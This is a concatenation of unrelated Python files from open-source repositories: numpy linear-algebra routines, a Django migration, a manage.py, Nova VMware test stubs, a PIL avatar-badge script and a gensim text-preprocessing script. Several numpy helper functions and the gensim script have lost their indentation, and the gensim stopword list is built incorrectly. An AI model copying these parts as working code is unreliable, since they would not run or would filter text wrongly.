    t, result_t = _commonType(a)
    real_t = _realType(result_t)
    signature = 'D->Dd' if isComplexType(t) else 'd->dd'
    sign, logdet = _umath_linalg.slogdet(a, signature=signature)
    # Cast to the caller-facing types; scalar results are cast without
    # the `copy` keyword, mirroring how array results are handled.
    if isscalar(sign):
        sign = sign.astype(result_t)
        logdet = logdet.astype(real_t)
    else:
        sign = sign.astype(result_t, copy=False)
        logdet = logdet.astype(real_t, copy=False)
    return sign, logdet
def det(a):
    """
    Compute the determinant of an array.

    Parameters
    ----------
    a : (..., M, M) array_like
        Input array to compute determinants for.

    Returns
    -------
    det : (...) array_like
        Determinant of `a`.

    See Also
    --------
    slogdet : Another way of representing the determinant, more suitable
        for large matrices where underflow/overflow may occur.

    Notes
    -----
    Broadcasting rules apply, see the `numpy.linalg` documentation for
    details.  The determinant is computed via LU factorization using the
    LAPACK routine ``z/dgetrf``.

    Examples
    --------
    The determinant of a 2-D array [[a, b], [c, d]] is ad - bc:

    >>> a = np.array([[1, 2], [3, 4]])
    >>> np.linalg.det(a)
    -2.0

    Computing determinants for a stack of matrices:

    >>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
    >>> np.linalg.det(a)
    array([-2., -3., -8.])
    """
    a = asarray(a)
    _assertRankAtLeast2(a)
    _assertNdSquareness(a)
    t, result_t = _commonType(a)
    signature = 'D->D' if isComplexType(t) else 'd->d'
    r = _umath_linalg.det(a, signature=signature)
    # Scalar results are cast without the `copy` keyword, mirroring how
    # array results are handled.
    return r.astype(result_t) if isscalar(r) else r.astype(result_t, copy=False)
# Linear Least Squares
def lstsq(a, b, rcond="warn"):
    """
    Return the least-squares solution to a linear matrix equation.

    Solves the equation `a x = b` by computing a vector `x` that
    minimizes the Euclidean 2-norm `|| b - a x ||^2`.  The equation may
    be under-, well-, or over- determined (i.e., the number of
    linearly independent rows of `a` can be less than, equal to, or
    greater than its number of linearly independent columns).  If `a`
    is square and of full rank, then `x` (but for round-off error) is
    the "exact" solution of the equation.

    Parameters
    ----------
    a : (M, N) array_like
        "Coefficient" matrix.
    b : {(M,), (M, K)} array_like
        Ordinate or "dependent variable" values. If `b` is two-dimensional,
        the least-squares solution is calculated for each of the `K` columns
        of `b`.
    rcond : float, optional
        Cut-off ratio for small singular values of `a`.
        For the purposes of rank determination, singular values are treated
        as zero if they are smaller than `rcond` times the largest singular
        value of `a`.

        .. versionchanged:: 1.14.0
           If not set, a FutureWarning is given. The previous default
           of ``-1`` will use the machine precision as `rcond` parameter,
           the new default will use the machine precision times `max(M, N)`.
           To silence the warning and use the new default, use ``rcond=None``,
           to keep using the old behavior, use ``rcond=-1``.

    Returns
    -------
    x : {(N,), (N, K)} ndarray
        Least-squares solution. If `b` is two-dimensional,
        the solutions are in the `K` columns of `x`.
    residuals : {(), (1,), (K,)} ndarray
        Sums of residuals; squared Euclidean 2-norm for each column in
        ``b - a*x``.
        If the rank of `a` is < N or M <= N, this is an empty array.
        If `b` is 1-dimensional, this is a (1,) shape array.
        Otherwise the shape is (K,).
    rank : int
        Rank of matrix `a`.
    s : (min(M, N),) ndarray
        Singular values of `a`.

    Raises
    ------
    LinAlgError
        If computation does not converge.

    Notes
    -----
    If `b` is a matrix, then all array results are returned as matrices.

    Examples
    --------
    Fit a line, ``y = mx + c``, through some noisy data-points:

    >>> x = np.array([0, 1, 2, 3])
    >>> y = np.array([-1, 0.2, 0.9, 2.1])

    By examining the coefficients, we see that the line should have a
    gradient of roughly 1 and cut the y-axis at, more or less, -1.

    We can rewrite the line equation as ``y = Ap``, where ``A = [[x 1]]``
    and ``p = [[m], [c]]``.  Now use `lstsq` to solve for `p`:

    >>> A = np.vstack([x, np.ones(len(x))]).T
    >>> A
    array([[ 0.,  1.],
           [ 1.,  1.],
           [ 2.,  1.],
           [ 3.,  1.]])

    >>> m, c = np.linalg.lstsq(A, y)[0]
    >>> print(m, c)
    1.0 -0.95

    Plot the data along with the fitted line:

    >>> import matplotlib.pyplot as plt
    >>> plt.plot(x, y, 'o', label='Original data', markersize=10)
    >>> plt.plot(x, m*x + c, 'r', label='Fitted line')
    >>> plt.legend()
    >>> plt.show()
    """
    import math
    a, _ = _makearray(a)
    b, wrap = _makearray(b)
    is_1d = b.ndim == 1
    if is_1d:
        # LAPACK expects a 2-D right-hand side; promote here and squeeze
        # the solution back to 1-D on the way out.
        b = b[:, newaxis]
    _assertRank2(a, b)
    _assertNoEmpty2d(a, b)  # TODO: relax this constraint
    m = a.shape[0]
    n = a.shape[1]
    n_rhs = b.shape[1]
    # xGELSD overwrites its RHS buffer with the solution, so the buffer's
    # leading dimension must fit both the RHS (m rows) and the solution
    # (n rows).
    ldb = max(n, m)
    if m != b.shape[0]:
        raise LinAlgError('Incompatible dimensions')
    t, result_t = _commonType(a, b)
    # Determine default rcond value
    if rcond == "warn":
        # 2017-08-19, 1.14.0
        warnings.warn("`rcond` parameter will change to the default of "
                      "machine precision times ``max(M, N)`` where M and N "
                      "are the input matrix dimensions.\n"
                      "To use the future default and silence this warning "
                      "we advise to pass `rcond=None`, to keep using the old, "
                      "explicitly pass `rcond=-1`.",
                      FutureWarning, stacklevel=2)
        rcond = -1
    if rcond is None:
        # The new (1.14) default: machine precision scaled by max(M, N).
        rcond = finfo(t).eps * ldb
    result_real_t = _realType(result_t)
    real_t = _linalgRealType(t)
    # Copy b into an (ldb, n_rhs) scratch buffer so the in-place solution
    # fits.
    bstar = zeros((ldb, n_rhs), t)
    bstar[:b.shape[0], :n_rhs] = b.copy()
    # LAPACK wants Fortran-ordered, native-byte-order data.
    a, bstar = _fastCopyAndTranspose(t, a, bstar)
    a, bstar = _to_native_byte_order(a, bstar)
    s = zeros((min(m, n),), real_t)
    # This line:
    # * is incorrect, according to the LAPACK documentation
    # * raises a ValueError if min(m,n) == 0
    # * should not be calculated here anyway, as LAPACK should calculate
    #   `liwork` for us. But that only works if our version of lapack does
    #   not have this bug:
    #   http://icl.cs.utk.edu/lapack-forum/archives/lapack/msg00899.html
    #   Lapack_lite does have that bug...
    nlvl = max( 0, int( math.log( float(min(m, n))/2. ) ) + 1 )
    iwork = zeros((3*min(m, n)*nlvl+11*min(m, n),), fortran_int)
    if isComplexType(t):
        # Complex path: zGELSD needs both a complex workspace (`work`)
        # and a real one (`rwork`), each sized by a workspace query.
        lapack_routine = lapack_lite.zgelsd
        lwork = 1
        rwork = zeros((lwork,), real_t)
        work = zeros((lwork,), t)
        # Workspace query: lwork=-1 writes the optimal size into work[0].
        results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
                                 0, work, -1, rwork, iwork, 0)
        lwork = int(abs(work[0]))
        rwork = zeros((lwork,), real_t)
        a_real = zeros((m, n), real_t)
        bstar_real = zeros((ldb, n_rhs,), real_t)
        # Second query via dGELSD on dummy real arrays to size rwork.
        results = lapack_lite.dgelsd(m, n, n_rhs, a_real, m,
                                     bstar_real, ldb, s, rcond,
                                     0, rwork, -1, iwork, 0)
        lrwork = int(rwork[0])
        work = zeros((lwork,), t)
        rwork = zeros((lrwork,), real_t)
        # Actual solve; bstar is overwritten with the solution (and the
        # residual information in its trailing rows).
        results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
                                 0, work, lwork, rwork, iwork, 0)
    else:
        # Real path: a single workspace query, then the solve.
        lapack_routine = lapack_lite.dgelsd
        lwork = 1
        work = zeros((lwork,), t)
        results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
                                 0, work, -1, iwork, 0)
        lwork = int(work[0])
        work = zeros((lwork,), t)
        results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
                                 0, work, lwork, iwork, 0)
    if results['info'] > 0:
        raise LinAlgError('SVD did not converge in Linear Least Squares')
    resids = array([], result_real_t)
    if is_1d:
        x = array(ravel(bstar)[:n], dtype=result_t, copy=True)
        # Residual sums are only defined for overdetermined, full-rank
        # systems; they live in rows n..m of the transformed RHS.
        if results['rank'] == n and m > n:
            if isComplexType(t):
                resids = array([sum(abs(ravel(bstar)[n:])**2)],
                               dtype=result_real_t)
            else:
                resids = array([sum((ravel(bstar)[n:])**2)],
                               dtype=result_real_t)
    else:
        x = array(transpose(bstar)[:n,:], dtype=result_t, copy=True)
        if results['rank'] == n and m > n:
            if isComplexType(t):
                resids = sum(abs(transpose(bstar)[n:,:])**2, axis=0).astype(
                    result_real_t, copy=False)
            else:
                resids = sum((transpose(bstar)[n:,:])**2, axis=0).astype(
                    result_real_t, copy=False)
    st = s[:min(n, m)].astype(result_real_t, copy=True)
    return wrap(x), wrap(resids), results['rank'], st
def _multi_svd_norm(x, row_axis, col_axis, op):
"""Compute a function of the singular values of the 2-D matrices in `x`.
This is a private utility function used by numpy.linalg.norm().
Parameters
----------
x : ndarray
row_axis, col_axis : int
The axes of `x` that hold the 2-D matrices.
op : callable
This should be either numpy.amin or numpy.amax or numpy.sum.
Returns
-------
result : float or ndarray
If `x` is 2-D, the return values is a float.
Otherwise, it is an array with ``x.ndim - 2`` dimensions.
The return values are either the minimum or maximum or sum of the
singular values of the matrices, depending on whether `op`
is `numpy.amin` or `numpy.amax` or `numpy.sum`.
"""
y = moveaxis(x, (row_axis, col_axis), (-2, -1))
result = op(svd(y, compute_uv=0), axis=-1)
return result
def norm(x, ord=None, axis=None, keepdims=False):
    """
    Matrix or vector norm.
    This function is able to return one of eight different matrix norms,
    or one of an infinite number of vector norms (described below), depending
    on the value of the ``ord`` parameter.
    Parameters
    ----------
    x : array_like
        Input array.  If `axis` is None, `x` must be 1-D or 2-D.
    ord : {non-zero int, inf, -inf, 'fro', 'nuc'}, optional
        Order of the norm (see table under ``Notes``). inf means numpy's
        `inf` object.
    axis : {int, 2-tuple of ints, None}, optional
        If `axis` is an integer, it specifies the axis of `x` along which to
        compute the vector norms.  If `axis` is a 2-tuple, it specifies the
        axes that hold 2-D matrices, and the matrix norms of these matrices
        are computed.  If `axis` is None then either a vector norm (when `x`
        is 1-D) or a matrix norm (when `x` is 2-D) is returned.
    keepdims : bool, optional
        If this is set to True, the axes which are normed over are left in the
        result as dimensions with size one.  With this option the result will
        broadcast correctly against the original `x`.
        .. versionadded:: 1.10.0
    Returns
    -------
    n : float or ndarray
        Norm of the matrix or vector(s).
    Notes
    -----
    For values of ``ord <= 0``, the result is, strictly speaking, not a
    mathematical 'norm', but it may still be useful for various numerical
    purposes.
    The following norms can be calculated:
    =====  ============================  ==========================
    ord    norm for matrices             norm for vectors
    =====  ============================  ==========================
    None   Frobenius norm                2-norm
    'fro'  Frobenius norm                --
    'nuc'  nuclear norm                  --
    inf    max(sum(abs(x), axis=1))      max(abs(x))
    -inf   min(sum(abs(x), axis=1))      min(abs(x))
    0      --                            sum(x != 0)
    1      max(sum(abs(x), axis=0))      as below
    -1     min(sum(abs(x), axis=0))      as below
    2      2-norm (largest sing. value)  as below
    -2     smallest singular value       as below
    other  --                            sum(abs(x)**ord)**(1./ord)
    =====  ============================  ==========================
    The Frobenius norm is given by [1]_:
        :math:`||A||_F = [\\sum_{i,j} abs(a_{i,j})^2]^{1/2}`
    The nuclear norm is the sum of the singular values.
    References
    ----------
    .. [1] G. H. Golub and C. F. Van Loan, *Matrix Computations*,
           Baltimore, MD, Johns Hopkins University Press, 1985, pg. 15
    Examples
    --------
    >>> from numpy import linalg as LA
    >>> a = np.arange(9) - 4
    >>> a
    array([-4, -3, -2, -1,  0,  1,  2,  3,  4])
    >>> b = a.reshape((3, 3))
    >>> b
    array([[-4, -3, -2],
           [-1,  0,  1],
           [ 2,  3,  4]])
    >>> LA.norm(a)
    7.745966692414834
    >>> LA.norm(b)
    7.745966692414834
    >>> LA.norm(b, 'fro')
    7.745966692414834
    >>> LA.norm(a, np.inf)
    4.0
    >>> LA.norm(b, np.inf)
    9.0
    >>> LA.norm(a, -np.inf)
    0.0
    >>> LA.norm(b, -np.inf)
    2.0
    >>> LA.norm(a, 1)
    20.0
    >>> LA.norm(b, 1)
    7.0
    >>> LA.norm(a, -1)
    -4.6566128774142013e-010
    >>> LA.norm(b, -1)
    6.0
    >>> LA.norm(a, 2)
    7.745966692414834
    >>> LA.norm(b, 2)
    7.3484692283495345
    >>> LA.norm(a, -2)
    nan
    >>> LA.norm(b, -2)
    1.8570331885190563e-016
    >>> LA.norm(a, 3)
    5.8480354764257312
    >>> LA.norm(a, -3)
    nan
    Using the `axis` argument to compute vector norms:
    >>> c = np.array([[ 1, 2, 3],
    ...               [-1, 1, 4]])
    >>> LA.norm(c, axis=0)
    array([ 1.41421356,  2.23606798,  5.        ])
    >>> LA.norm(c, axis=1)
    array([ 3.74165739,  4.24264069])
    >>> LA.norm(c, ord=1, axis=1)
    array([ 6.,  6.])
    Using the `axis` argument to compute matrix norms:
    >>> m = np.arange(8).reshape(2,2,2)
    >>> LA.norm(m, axis=(1,2))
    array([  3.74165739,  11.22497216])
    >>> LA.norm(m[0, :, :]), LA.norm(m[1, :, :])
    (3.7416573867739413, 11.224972160321824)
    """
    x = asarray(x)
    # Promote integer/bool input to float so the reductions below are done
    # in floating point; inexact and object dtypes are left untouched.
    if not issubclass(x.dtype.type, (inexact, object_)):
        x = x.astype(float)
    # Immediately handle some default, simple, fast, and common cases.
    if axis is None:
        ndim = x.ndim
        if ((ord is None) or
            (ord in ('f', 'fro') and ndim == 2) or
            (ord == 2 and ndim == 1)):
            # Default 2-norm / Frobenius norm over all elements:
            # sqrt(x . x), computed via dot() for speed.
            x = x.ravel(order='K')
            if isComplexType(x.dtype.type):
                sqnorm = dot(x.real, x.real) + dot(x.imag, x.imag)
            else:
                sqnorm = dot(x, x)
            ret = sqrt(sqnorm)
            if keepdims:
                # All axes were reduced; restore them as size-1 dims.
                ret = ret.reshape(ndim*[1])
            return ret
    # Normalize the `axis` argument to a tuple.
    nd = x.ndim
    if axis is None:
        axis = tuple(range(nd))
    elif not isinstance(axis, tuple):
        try:
            axis = int(axis)
        except Exception:
            raise TypeError("'axis' must be None, an integer or a tuple of integers")
        axis = (axis,)
    if len(axis) == 1:
        # --- Vector norms over a single axis ---
        if ord == Inf:
            return abs(x).max(axis=axis, keepdims=keepdims)
        elif ord == -Inf:
            return abs(x).min(axis=axis, keepdims=keepdims)
        elif ord == 0:
            # Zero norm
            return (x != 0).astype(float).sum(axis=axis, keepdims=keepdims)
        elif ord == 1:
            # special case for speedup
            return add.reduce(abs(x), axis=axis, keepdims=keepdims)
        elif ord is None or ord == 2:
            # special case for speedup
            s = (x.conj() * x).real
            return sqrt(add.reduce(s, axis=axis, keepdims=keepdims))
        else:
            # Generic p-norm; reject non-numeric ord (e.g. 'fro') for
            # vectors by probing it with an addition.
            try:
                ord + 1
            except TypeError:
                raise ValueError("Invalid norm order for vectors.")
            absx = abs(x)
            absx **= ord
            return add.reduce(absx, axis=axis, keepdims=keepdims) ** (1.0 / ord)
    elif len(axis) == 2:
        # --- Matrix norms over a pair of axes ---
        row_axis, col_axis = axis
        row_axis = normalize_axis_index(row_axis, nd)
        col_axis = normalize_axis_index(col_axis, nd)
        if row_axis == col_axis:
            raise ValueError('Duplicate axes given.')
        if ord == 2:
            ret = _multi_svd_norm(x, row_axis, col_axis, amax)
        elif ord == -2:
            ret = _multi_svd_norm(x, row_axis, col_axis, amin)
        elif ord == 1:
            # max column sum.  After reducing over row_axis, the axes of
            # the result shift down, so col_axis must be adjusted when it
            # came after row_axis.
            if col_axis > row_axis:
                col_axis -= 1
            ret = add.reduce(abs(x), axis=row_axis).max(axis=col_axis)
        elif ord == Inf:
            # max row sum; same axis-shift adjustment as above.
            if row_axis > col_axis:
                row_axis -= 1
            ret = add.reduce(abs(x), axis=col_axis).max(axis=row_axis)
        elif ord == -1:
            # min column sum.
            if col_axis > row_axis:
                col_axis -= 1
            ret = add.reduce(abs(x), axis=row_axis).min(axis=col_axis)
        elif ord == -Inf:
            # min row sum.
            if row_axis > col_axis:
                row_axis -= 1
            ret = add.reduce(abs(x), axis=col_axis).min(axis=row_axis)
        elif ord in [None, 'fro', 'f']:
            ret = sqrt(add.reduce((x.conj() * x).real, axis=axis))
        elif ord == 'nuc':
            ret = _multi_svd_norm(x, row_axis, col_axis, sum)
        else:
            raise ValueError("Invalid norm order for matrices.")
        if keepdims:
            # Reinsert the two reduced axes as size-1 dimensions.
            ret_shape = list(x.shape)
            ret_shape[axis[0]] = 1
            ret_shape[axis[1]] = 1
            ret = ret.reshape(ret_shape)
        return ret
    else:
        raise ValueError("Improper number of dimensions to norm.")
# multi_dot
def multi_dot(arrays):
    """
    Compute the dot product of two or more arrays in a single function call,
    while automatically selecting the fastest evaluation order.
    `multi_dot` chains `numpy.dot` and uses optimal parenthesization
    of the matrices [1]_ [2]_. Depending on the shapes of the matrices,
    this can speed up the multiplication a lot.
    If the first argument is 1-D it is treated as a row vector.
    If the last argument is 1-D it is treated as a column vector.
    The other arguments must be 2-D.
    Think of `multi_dot` as::
        def multi_dot(arrays): return functools.reduce(np.dot, arrays)
    Parameters
    ----------
    arrays : sequence of array_like
        If the first argument is 1-D it is treated as row vector.
        If the last argument is 1-D it is treated as column vector.
        The other arguments must be 2-D.
    Returns
    -------
    output : ndarray
        Returns the dot product of the supplied arrays.
    See Also
    --------
    dot : dot multiplication with two arguments.
    References
    ----------
    .. [1] Cormen, "Introduction to Algorithms", Chapter 15.2, p. 370-378
    .. [2] http://en.wikipedia.org/wiki/Matrix_chain_multiplication
    Examples
    --------
    `multi_dot` allows you to write::
        >>> from numpy.linalg import multi_dot
        >>> # Prepare some data
        >>> A = np.random.random((10000, 100))
        >>> B = np.random.random((100, 1000))
        >>> C = np.random.random((1000, 5))
        >>> D = np.random.random((5, 333))
        >>> # the actual dot multiplication
        >>> multi_dot([A, B, C, D])
    instead of::
        >>> np.dot(np.dot(np.dot(A, B), C), D)
        >>> # or
        >>> A.dot(B).dot(C).dot(D)
    Notes
    -----
    The cost for a matrix multiplication can be calculated with the
    following function::
        def cost(A, B):
            return A.shape[0] * A.shape[1] * B.shape[1]
    Let's assume we have three matrices
    :math:`A_{10x100}, B_{100x5}, C_{5x50}`.
    The costs for the two different parenthesizations are as follows::
        cost((AB)C) = 10*100*5 + 10*5*50   = 5000 + 2500   = 7500
        cost(A(BC)) = 10*100*50 + 100*5*50 = 50000 + 25000 = 75000
    """
    n = len(arrays)
    # optimization only makes sense for len(arrays) > 2
    if n < 2:
        raise ValueError("Expecting at least two arrays.")
    elif n == 2:
        # Nothing to optimize for exactly two operands.
        return dot(arrays[0], arrays[1])
    arrays = [asanyarray(a) for a in arrays]
    # save original ndim to reshape the result array into the proper form later
    ndim_first, ndim_last = arrays[0].ndim, arrays[-1].ndim
    # Explicitly convert vectors to 2D arrays to keep the logic of the internal
    # _multi_dot_* functions as simple as possible.
    if arrays[0].ndim == 1:
        arrays[0] = atleast_2d(arrays[0])
    if arrays[-1].ndim == 1:
        arrays[-1] = atleast_2d(arrays[-1]).T
    _assertRank2(*arrays)
    # _multi_dot_three is much faster than _multi_dot_matrix_chain_order
    if n == 3:
        result = _multi_dot_three(arrays[0], arrays[1], arrays[2])
    else:
        order = _multi_dot_matrix_chain_order(arrays)
        result = _multi_dot(arrays, order, 0, n - 1)
    # return proper shape
    if ndim_first == 1 and ndim_last == 1:
        return result[0, 0]  # scalar
    elif ndim_first == 1 or ndim_last == 1:
        return result.ravel()  # 1-D
    else:
        return result
def _multi_dot_three(A, B, C):
"""
Find the best order for three arrays and do the multiplication.
For three arguments `_multi_dot_three` is approximately 15 times faster
than `_multi_dot_matrix_chain_order`
"""
a0, a1b0 = A.shape
b1c0, c1 = C.shape
# cost1 = cost((AB)C) = a0*a1b0*b1c0 + a0*b1c0*c1
cost1 = a0 * b1c0 * (a1b0 + c1)
# cost2 = cost(A(BC)) = a1b0*b1c0*c1 + a0*a1b0*c1
cost2 = a1b0 * c1 * (a0 + b1c0)
if cost1 < cost2:
return dot(dot(A, B), C)
else:
return dot(A, dot(B, C))
def _multi_dot_matrix_chain_order(arrays, return_costs=False):
"""
Return a np.array that encodes the optimal order of mutiplications.
The optimal order array is then used by `_multi_dot()` to do the
multiplication.
Also return the cost matrix if `return_costs` is `True`
The implementation CLOSELY follows Cormen, "Introduction to Algorithms",
Chapter 15.2, p. 370-378. Note that Cormen uses 1-based indices.
cost[i, j] = min([
cost[prefix] + cost[suffix] + cost_mult(prefix, suffix)
for k in range(i, j)])
"""
n = len(arrays)
# p stores the dimensions of the matrices
# Example for p: A_{10x100}, B_{100x5}, C_{5x50} --> p = [10, 100, 5, 50]
p = [a.shape[0] for a in arrays] + [arrays[-1].shape[1]]
# m is a matrix of costs of the subproblems
# m[i,j]: min number of scalar multiplications needed to compute A_{i..j}
m = zeros((n, n), dtype=double)
# s is the actual ordering
# s[i, j] is the value of k at which we split the product A_i..A_j
s = empty((n, n), dtype=intp)
for l in range(1, n):
for i in range(n - l):
j = i + l
m[i, j] = Inf
for k in range(i, j):
q = m[i, k] + m[k+1, j] + p[i]*p[k+1]*p[j+1]
if q < m[i, j]:
m[i, j] = q
s[i, j] = k # Note that Cormen uses 1-based index
return (s, m) if return_costs else s
def _multi_dot(arrays, order, i, j):
"""Actually do the multiplication with the given order."""
if i == j:
return arrays[i]
else:
return dot(_multi_dot(arrays, order, i, order[i, j]),
_multi_dot(arrays, order, order[i, j] + 1, j))
| b-carter/numpy | numpy/linalg/linalg.py | Python | bsd-3-clause | 77,776 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Requires the initial annotation migration to have been applied first.
    dependencies = [
        ('annotation', '0001_initial'),
    ]
    # Default queryset ordering for Annotation becomes oldest-first by
    # creation timestamp.  Meta-options-only change: no schema alteration.
    operations = [
        migrations.AlterModelOptions(
            name='annotation',
            options={'ordering': ('created',)},
        ),
    ]
| PsypherPunk/django-annotations | annotation/migrations/0002_auto_20160129_1311.py | Python | apache-2.0 | 369 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Point Django at this project's settings unless the caller already set
    # DJANGO_SETTINGS_MODULE in the environment.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "edjango.settings")
    from django.core.management import execute_from_command_line
    # Dispatch the command-line arguments (runserver, migrate, ...).
    execute_from_command_line(sys.argv)
| sarusso/eDjango | manage.py | Python | apache-2.0 | 250 |
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Stubouts for the test suite
"""
import contextlib
import mock
from nova.virt.vmwareapi import driver
from nova.virt.vmwareapi import error_util
from nova.virt.vmwareapi import fake
from nova.virt.vmwareapi import network_util
from nova.virt.vmwareapi import vmware_images
def fake_get_vim_object(arg):
    """Stubs out the VMwareAPISession's get_vim_object method."""
    # `arg` (the session instance) is ignored; always hand back a FakeVim.
    return fake.FakeVim()
def fake_is_vim_object(arg, module):
    """Stubs out the VMwareAPISession's is_vim_object method."""
    # True only when `module` is an instance of the fake Vim class.
    return isinstance(module, fake.FakeVim)
def fake_temp_method_exception():
    """Raise the fault seen when an API call lacks an authenticated session."""
    raise error_util.VimFaultException(
        [error_util.NOT_AUTHENTICATED],
        "Session Empty/Not Authenticated")
def fake_temp_session_exception():
    """Raise a transport-level session connection failure."""
    raise error_util.SessionConnectionException("it's a fake!",
                                                "Session Exception")
def fake_session_file_exception():
    """Raise the fault seen when a datastore file already exists."""
    raise error_util.VimFaultException([error_util.FILE_ALREADY_EXISTS],
                                       'fake')
def fake_session_permission_exception():
    """Raise a NO_PERMISSION fault with a representative detail payload."""
    details = {'privilegeId': 'Resource.AssignVMToPool',
               'object': 'domain-c7'}
    message = 'Permission to perform this operation was denied.'
    raise error_util.VimFaultException([error_util.NO_PERMISSION], message,
                                       details)
def set_stubs(stubs):
    """Set the stubs."""
    # Network helper returns canned fake networks instead of querying VC.
    stubs.Set(network_util, 'get_network_with_the_name',
              fake.fake_get_network)
    # Image transfer paths are replaced so no Glance/datastore I/O happens.
    stubs.Set(vmware_images, 'fetch_image', fake.fake_fetch_image)
    stubs.Set(vmware_images, 'get_vmdk_size_and_properties',
              fake.fake_get_vmdk_size_and_properties)
    stubs.Set(vmware_images, 'upload_image', fake.fake_upload_image)
    # Session plumbing talks to the in-memory FakeVim instead of a real VC.
    stubs.Set(driver.VMwareAPISession, "_get_vim_object",
              fake_get_vim_object)
    stubs.Set(driver.VMwareAPISession, "_is_vim_object",
              fake_is_vim_object)
def fake_suds_context(calls=None):
    """Generate a suds client which automatically mocks all SOAP method calls.

    Calls are stored in <calls>, indexed by the name of the call. If you need
    to mock the behaviour of specific API calls you can pre-populate <calls>
    with appropriate Mock objects.
    """
    # The original signature used a mutable default (calls={}), which
    # silently shared the recorded calls between every invocation that
    # relied on the default.  Create a fresh dict per call instead.
    if calls is None:
        calls = {}

    class fake_factory:
        def create(self, name):
            # Factory products are non-callable so accidental invocation
            # fails loudly in tests.
            return mock.NonCallableMagicMock(name=name)

    class fake_service:
        def __getattr__(self, attr_name):
            if attr_name in calls:
                return calls[attr_name]
            # First use of this SOAP method: record a fresh mock for it so
            # later lookups (and the caller's assertions) see the same one.
            mock_call = mock.MagicMock(name=attr_name)
            calls[attr_name] = mock_call
            return mock_call

    class fake_client:
        def __init__(self, wdsl_url, **kwargs):
            self.service = fake_service()
            self.factory = fake_factory()

    return contextlib.nested(
        mock.patch('suds.client.Client', fake_client),
        # As we're not connecting to a real host there's no need to wait
        # between retries
        mock.patch.object(driver, 'TIME_BETWEEN_API_CALL_RETRIES', 0)
    )
| nkrinner/nova | nova/tests/virt/vmwareapi/stubs.py | Python | apache-2.0 | 3,654 |
#-*- coding: UTF-8 -*-
from PIL import Image, ImageDraw, ImageFont
#第 0000 题:将你的 QQ 头像(或者微博头像)右上角加上红色的数字,类似于微信未读信息数量那种提示效果。 类似于图中效果
def add_num(image_file_path, num, fill, font_name, out_path='result.jpg'):
    """Draw `num` in the top-right corner of an image (unread-badge style).

    Parameters
    ----------
    image_file_path : str
        Path of the source image.
    num : int
        The number to draw.
    fill : tuple
        RGB(A) fill colour for the text, e.g. (255, 0, 255).
    font_name : str
        Path to a TrueType font file.
    out_path : str, optional
        Where to save the result; defaults to 'result.jpg' as before.
    """
    im = Image.open(image_file_path)
    x_size, y_size = im.size  # PIL reports (width, height)
    draw = ImageDraw.Draw(im)
    text = str(num)
    # Font size scales with the image width.
    font = ImageFont.truetype(font_name, x_size // 3)
    # Anchor the text 4/5 of the way across the image *width*.  The
    # original used y_size (the height) for this horizontal offset, which
    # only worked for square images.
    draw.text((x_size // 5 * 4, 0), text, fill, font)
    # NOTE(review): a PNG with an alpha channel cannot be saved as JPEG
    # without converting to RGB first -- TODO confirm expected inputs.
    im.save(out_path)
if __name__ == '__main__':
    # Demo: stamp a magenta "3" onto image.png.
    image_path = 'image.png'
    fill_num = 3
    fill_color = (255, 0, 255)
    # NOTE(review): Windows-only font path; adjust on other platforms.
    fill_font = "C:/windows/fonts/Arial.ttf"
    add_num(image_path, fill_num, fill_color, fill_font)
| zhangmianhongni/MyPractice | Python/Python 练习册(show-me-the-code)/0000/0000.py | Python | apache-2.0 | 748 |
import logging, gensim, pickle, re
from gensim import corpora,models
from nltk.corpus import stopwords
import nltk
from nltk.stem.lancaster import LancasterStemmer
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
from gensim import corpora,models, similarities
pronounlist = ['he','she','his','her','him','they','their','them','it','its','we','our','us','you','your']
with open('user_input_v1.txt') as f:
documents = f.readlines()
stoplist = [stopwords.words('english'),'d','dd','ddd','dddd']
print stoplist
#texts =[[word for word in ' '.join(document).lower().split() if word not in stoplist] for document in documents]
with open('contraction.pkl') as f:
contractions = pickle.load(f)
texts_stemmed = []
texts_all = []
n_pronoun = []
n_word = []
for document in documents:
print document
n_word_i = 0
n_pronoun_i =0
texts_stemmed = []
for text in document.split():
text = re.sub('[?!,.]', ' ', text)
text = text.lower()
n_word.append(len(text))
#text = LancasterStemmer().stem(text)
#texts_stemmed.append(text)
if text in contractions.keys():
text = contractions[text].split()
print text
if type(text) is list:
for text_i in text:
if text_i not in stoplist:
texts_stemmed.append(text_i)
if text_i in pronounlist:
n_pronoun_i = n_pronoun_i + 1
else:
if text not in stoplist:
texts_stemmed.append(text)
if text in pronounlist:
n_pronoun_i = n_pronoun_i + 1
else:
if text not in stoplist:
texts_stemmed.append(text)
if text in pronounlist:
n_pronoun_i = n_pronoun_i +1
n_pronoun.append(n_pronoun_i)
print "this is one document"
texts_all.append(texts_stemmed)
print "pronoun percentage"
print sum(n_pronoun)
print sum(n_word)
print float(sum(n_pronoun))/float(sum(n_word))
print 'this is the texts_all'
fdist = nltk.FreqDist([item for sublist in texts_all for item in sublist])
print fdist.most_common(50)
with open('texts_all.txt','w') as f:
for texts in texts_all:
f.write( ' '.join(texts) +'\n')
# here let us try, if we git rid of all the usual words shown
freqwordlist = ['hello','favorite','sure','like','what','think','know','do','hi']
text_all_nf =[]
for text_all_i in texts_all:
#print text_all_i
#if text_all_i.find(' '):
#text = text_all_i.split()
text_filter = [w for w in text_all_i if not w in freqwordlist]
text_all_nf.append(text_filter)
#dictionary = corpora.Dictionary(texts_all)
dictionary = corpora.Dictionary(text_all_nf)
print "we are printing the dictionary"
print dictionary
dictionary.save('user_input.dict')
new_doc = "i like to watch movies"
